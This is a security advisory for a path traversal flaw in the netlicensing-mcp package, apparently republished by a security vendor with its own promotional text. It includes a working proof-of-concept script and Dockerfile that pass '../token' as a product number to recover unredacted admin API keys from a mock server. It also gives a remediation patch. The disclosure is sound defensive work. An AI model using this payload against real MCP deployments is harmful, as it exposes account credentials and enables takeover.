GHSA-HXPF-9XVQ-WPH8

GHSA-HXPF-9XVQ-WPH8 is a critical-severity path traversal vulnerability in netlicensing-mcp (pip), affecting versions < 0.1.8. It is fixed in 0.1.8.

Summary

REST Path Traversal Bypasses Token Redaction in netlicensing-mcp

The netlicensing_get_product MCP tool in netlicensing-mcp interpolates a caller-controlled product_number argument directly into a REST URL path without any validation. Passing ../token as the product number causes httpx to normalize /product/../token into /token, silently redirecting the request to the NetLicensing token endpoint instead of the intended product endpoint. The response is then serialized through the generic _wrap_json wrapper rather than the token-specific _wrap_json_token_read wrapper, bypassing all APIKEY number and SHOP shopURL redaction. An authenticated MCP client can recover plaintext API key values that the token read tools intentionally mask, including admin-level APIKEY credentials.

Details

The vulnerability is a path traversal (CWE-22) that exploits the interaction between unsanitized string interpolation and httpx's WHATWG URL normalization.

Source, src/netlicensing_mcp/tools/products.py:22

async def get_product(product_number: str) -> dict:
    """Get a single product by its number."""
    return strip_output_fields(await nl_get(f"/product/{product_number}"))

product_number is inserted directly into the REST path with no validation. A value of ../token produces the path /product/../token.

Sink, src/netlicensing_mcp/client.py:143

async def nl_get(path: str, params: dict[str, str] | None = None) -> dict[str, Any]:
    client = _get_client()
    url = f"{BASE_URL}{path}"
    ...
    r = await client.get(url, headers=_headers(), params=params or {})

httpx constructs the full URL as {BASE_URL}/product/../token and, per WHATWG URL normalization rules applied to absolute URLs, resolves it to {BASE_URL}/token. The HTTP request is therefore sent to the NetLicensing /core/v2/rest/token endpoint.

Redaction bypass, src/netlicensing_mcp/server.py:336 and src/netlicensing_mcp/redaction.py:180-239

The tool handler wraps the response via _wrap_json(entity, "Product"), which calls only the generic _json() redaction. The token-specific path _wrap_json_token_read()redact_token_read() is never invoked. The function redact_token_read() at redaction.py:180-239 is the only code that masks APIKEY number and SHOP shopURL fields; because it is not on this code path, the raw API key value is returned verbatim in the MCP tool output.

Complete data flow:

  1. server.py:312-321, MCP dispatcher receives attacker-controlled product_number and calls products.get_product(product_number).
  2. tools/products.py:22, value interpolated into f"/product/{product_number}" without validation.
  3. client.py:143, url = f"{BASE_URL}{path}"; httpx normalizes ../ and sends request to /token endpoint.
  4. server.py:336, response wrapped as "Product" via _wrap_json, not _wrap_json_token_read.
  5. server.py:160-165, generic _json() redaction applies only default-field masking.
  6. redaction.py:180-239, redact_token_read() with APIKEY/SHOP-specific masking is never reached.

PoC

Prerequisites

  • Python 3.10+
  • netlicensing-mcp 0.1.5 (or local commit c8a3fec) installed or available via PYTHONPATH
  • httpx, python-dotenv, mcp[cli] installed

Option A, Docker (recommended, reproduces Phase 2 result)

# Build from the repository root (requires repo/ and vuln-001/ directories)
docker build -t netlicensing-vuln-001 \
  -f vuln-001/Dockerfile \
  reports/pypiAi_1561_Labs64__NetLicensing-MCP/

# Run, exit code 0 confirms the vulnerability
docker run --rm netlicensing-vuln-001

Option B, Direct Python

cd /path/to/Labs64__NetLicensing-MCP
PYTHONPATH=src python3 - <<'PY'
import asyncio, json, threading
from http.server import BaseHTTPRequestHandler, HTTPServer

seen = []
secret = "actual-api-key-value-5678"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        seen.append(self.path)
        if self.path.endswith("/token"):
            body = {"items":{"item":[{"type":"Token","property":[
                {"name":"number","value":secret},
                {"name":"tokenType","value":"APIKEY"},
                {"name":"role","value":"ROLE_APIKEY_ADMIN"},
                {"name":"active","value":"true"}
            ]}]}}
            data = json.dumps(body).encode()
            self.send_response(200)
            self.send_header("Content-Type","application/json")
            self.send_header("Content-Length",str(len(data)))
            self.end_headers()
            self.wfile.write(data)
        else:
            self.send_response(404); self.end_headers()
    def log_message(self, *args): pass

srv = HTTPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=srv.serve_forever, daemon=True).start()

async def main():
    import netlicensing_mcp.client as c
    c.BASE_URL = f"http://127.0.0.1:{srv.server_port}/core/v2/rest"
    tok = c.api_key_ctx.set("dummy")
    try:
        from netlicensing_mcp.server import netlicensing_get_product
        out = await netlicensing_get_product("../token")
        print("UPSTREAM_PATH=" + seen[0])
        print("SECRET_LEAKED=" + str(secret in out))
        print(out)
    finally:
        c.api_key_ctx.reset(tok)
        await c.close_client()
        srv.shutdown()

asyncio.run(main())
PY

Expected output

UPSTREAM_PATH=/core/v2/rest/token
PATH_TRAVERSAL_OK=True
SECRET_LEAKED=True

=== MCP tool output (netlicensing_get_product('../token')) ===
{
  "number": "actual-api-key-value-5678",
  "tokenType": "APIKEY",
  "role": "ROLE_APIKEY_ADMIN",
  "active": true,
  "type": "Token",
  "console_url": "https://ui.netlicensing.io/#/tokens/actual-api-key-value-5678",
  "warnings": [],
  "suggested_actions": []
}
[PASS] VULN-001 CONFIRMED: path traversal reached /token endpoint and plaintext secret 'actual-api-key-value-5678' is present in MCP output

The number field contains the raw API key value and console_url embeds it in plaintext, both fields that redact_token_read() would otherwise mask.

Remediation

Add a centralized path-segment validator in client.py and call it from all HTTP helper functions (nl_get, nl_post, nl_put, nl_delete):

+from urllib.parse import unquote
+
+def _validated_path(path: str) -> str:
+    if not path.startswith("/"):
+        raise NetLicensingError(400, "Internal error: upstream path must start with '/'")
+    for segment in path.split("/"):
+        decoded = unquote(segment)
+        if decoded in {".", ".."} or "/" in decoded or "\\" in decoded:
+            raise NetLicensingError(400, "Invalid identifier: path separators are not allowed")
+        if any(ord(ch) < 32 for ch in decoded):
+            raise NetLicensingError(400, "Invalid identifier: control characters are not allowed")
+    return path
+
 async def nl_get(path: str, ...) -> dict[str, Any]:
-    url = f"{BASE_URL}{path}"
+    url = f"{BASE_URL}{_validated_path(path)}"

Apply the same change to nl_post, nl_put, and nl_delete. Add regression tests for inputs ../token, %2e%2e, %2f, and x/y.

Reproduction artifacts

Dockerfile

FROM python:3.12-slim

WORKDIR /app

# Copy the cloned repository source
COPY repo/ /app/repo/

# Install runtime dependencies directly to avoid hatch-vcs version-detection
# issues when building outside a proper git-tagged worktree.
RUN pip install --no-cache-dir \
    "httpx>=0.27.0" \
    "python-dotenv>=1.0.0" \
    "mcp[cli]>=1.7.0"

# Make the package importable via PYTHONPATH (avoids editable-install build step)
ENV PYTHONPATH=/app/repo/src

# Copy the proof-of-concept script
COPY vuln-001/poc.py /app/poc.py

# Exit code 0 = PASS (secret leaked), 1 = FAIL
CMD ["python3", "/app/poc.py"]

poc.py

#!/usr/bin/env python3
"""
VULN-001 Proof of Concept: REST Path Traversal Bypasses Token Redaction
=======================================================================
Vulnerability: netlicensing_get_product(product_number="../token")

Attack flow:
  1. product_number="../token" is interpolated into f"/product/{product_number}"
     => path = "/product/../token"
  2. client.py builds url = f"{BASE_URL}/product/../token"
  3. httpx normalizes the URL per WHATWG: /product/../token => /token
     => actual HTTP request lands on BASE_URL/token (the token endpoint)
  4. Response is wrapped via _wrap_json(..., "Product") which calls _json()
     => only default-field redaction (apiKey, secret, etc.) runs
     => _wrap_json_token_read() / redact_token_read() is NEVER called
  5. APIKEY token "number" field (= the raw API key value) is returned in
     plaintext in the MCP tool output.

Expected exit codes:
  0, PASS: path traversal confirmed AND secret found in MCP output
  1, FAIL: could not confirm the vulnerability
"""

import asyncio
import json
import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Sentinel value used as the fake APIKEY token number (the "leaked secret").
SECRET_APIKEY = "actual-api-key-value-5678"

# Collects every upstream request path received by the mock server.
seen_paths: list[str] = []


class MockNetLicensingHandler(BaseHTTPRequestHandler):
    """Minimal mock of the NetLicensing REST API for PoC isolation."""

    def do_GET(self) -> None:
        seen_paths.append(self.path)

        # Respond to ANY path ending with "/token" to capture both the
        # normalized (/core/v2/rest/token) and raw (/core/v2/rest/product/../token)
        # cases, in practice httpx always sends the normalized form.
        if self.path.endswith("/token"):
            body: dict = {
                "items": {
                    "item": [
                        {
                            "type": "Token",
                            "property": [
                                {"name": "number", "value": SECRET_APIKEY},
                                {"name": "tokenType", "value": "APIKEY"},
                                {"name": "role", "value": "ROLE_APIKEY_ADMIN"},
                                {"name": "active", "value": "true"},
                            ],
                        }
                    ]
                }
            }
            data = json.dumps(body).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *args: object) -> None:
        pass  # Suppress per-request log noise


async def run_poc(server_port: int) -> bool:
    """
    Invoke the vulnerable MCP tool with the traversal payload and check
    whether the upstream path was normalized and the secret leaked.

    Returns True when both conditions are confirmed.
    """
    import netlicensing_mcp.client as client
    from netlicensing_mcp.server import netlicensing_get_product

    # Redirect the HTTP client to the mock server.
    original_base_url = client.BASE_URL
    client.BASE_URL = f"http://127.0.0.1:{server_port}/core/v2/rest"

    # Inject a dummy API key so _headers() does not raise a 503.
    ctx_token = client.api_key_ctx.set("dummy-key-for-poc")
    try:
        # ---- THE EXPLOIT ------------------------------------------------
        # Pass "../token" as product_number.
        # products.get_product calls nl_get(f"/product/../token")
        # httpx normalizes /product/../token -> /token
        # The request hits /core/v2/rest/token on the mock server.
        # The response is serialized via _wrap_json (not _wrap_json_token_read)
        # so the APIKEY "number" field is NOT masked.
        # -----------------------------------------------------------------
        result: str = await netlicensing_get_product("../token")

        upstream_path = seen_paths[0] if seen_paths else "(none received)"
        path_traversal_ok = upstream_path == "/core/v2/rest/token"
        secret_in_output = SECRET_APIKEY in result

        print(f"UPSTREAM_PATH={upstream_path}")
        print(f"PATH_TRAVERSAL_OK={path_traversal_ok}")
        print(f"SECRET_LEAKED={secret_in_output}")
        print()
        print("=== MCP tool output (netlicensing_get_product('../token')) ===")
        print(result)
        print("=== end ===")

        if path_traversal_ok and secret_in_output:
            print()
            print(
                "[PASS] VULN-001 CONFIRMED: path traversal reached /token endpoint "
                f"and plaintext secret '{SECRET_APIKEY}' is present in MCP output"
            )
        else:
            if not path_traversal_ok:
                print(
                    f"[FAIL] Path traversal did not work: upstream_path={upstream_path!r}, "
                    "expected /core/v2/rest/token"
                )
            if not secret_in_output:
                print(
                    f"[FAIL] Secret '{SECRET_APIKEY}' not found in MCP output, "
                    "redaction may have been applied unexpectedly"
                )

        return path_traversal_ok and secret_in_output

    finally:
        client.api_key_ctx.reset(ctx_token)
        await client.close_client()
        client.BASE_URL = original_base_url


def main() -> None:
    # Bind the mock server on a random loopback port.
    mock_server = HTTPServer(("127.0.0.1", 0), MockNetLicensingHandler)
    port: int = mock_server.server_address[1]

    server_thread = threading.Thread(target=mock_server.serve_forever, daemon=True)
    server_thread.start()

    print(f"[*] Mock NetLicensing REST API listening on 127.0.0.1:{port}")
    print(f"[*] Invoking netlicensing_get_product(product_number='../token')")
    print()

    try:
        success = asyncio.run(run_poc(port))
    finally:
        mock_server.shutdown()

    sys.exit(0 if success else 1)


if __name__ == "__main__":
    main()

Impact

An authenticated MCP client (one that already holds a NetLicensing API key sufficient to call any MCP tool) can call netlicensing_get_product("../token") to retrieve plaintext APIKEY number values and SHOP shopURL values that the dedicated token read tools (netlicensing_get_token, netlicensing_list_tokens) intentionally redact. If the retrieved token carries ROLE_APIKEY_ADMIN privileges, the attacker gains full read/write/delete access over all resources in the target NetLicensing account, escalating from a scoped MCP client to account owner.

This vulnerability is exploitable in any deployment mode, stdio (single-user) and HTTP/shared, because no non-default configuration is required. The attack requires only a valid API key to authenticate the MCP session; no admin privileges are needed to trigger the traversal.

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

GHSA-HXPF-9XVQ-WPH8 has a CVSS score of 9.6 (Critical). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.1.8); upgrading removes the vulnerable code path.

Affected versions

netlicensing-mcp (< 0.1.8)

Security releases

netlicensing-mcp → 0.1.8 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade netlicensing-mcp to 0.1.8 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-HXPF-9XVQ-WPH8? GHSA-HXPF-9XVQ-WPH8 is a critical-severity path traversal vulnerability in netlicensing-mcp (pip), affecting versions < 0.1.8. It is fixed in 0.1.8. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is GHSA-HXPF-9XVQ-WPH8? GHSA-HXPF-9XVQ-WPH8 has a CVSS score of 9.6 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of netlicensing-mcp are affected by GHSA-HXPF-9XVQ-WPH8? netlicensing-mcp (pip) versions < 0.1.8 is affected.
  4. Is there a fix for GHSA-HXPF-9XVQ-WPH8? Yes. GHSA-HXPF-9XVQ-WPH8 is fixed in 0.1.8. Upgrade to this version or later.
  5. Is GHSA-HXPF-9XVQ-WPH8 exploitable, and should I be worried? Whether GHSA-HXPF-9XVQ-WPH8 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-HXPF-9XVQ-WPH8 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-HXPF-9XVQ-WPH8? Upgrade netlicensing-mcp to 0.1.8 or later.

Other vulnerabilities in netlicensing-mcp

Stop the waste.
Protect your environment with Kodem.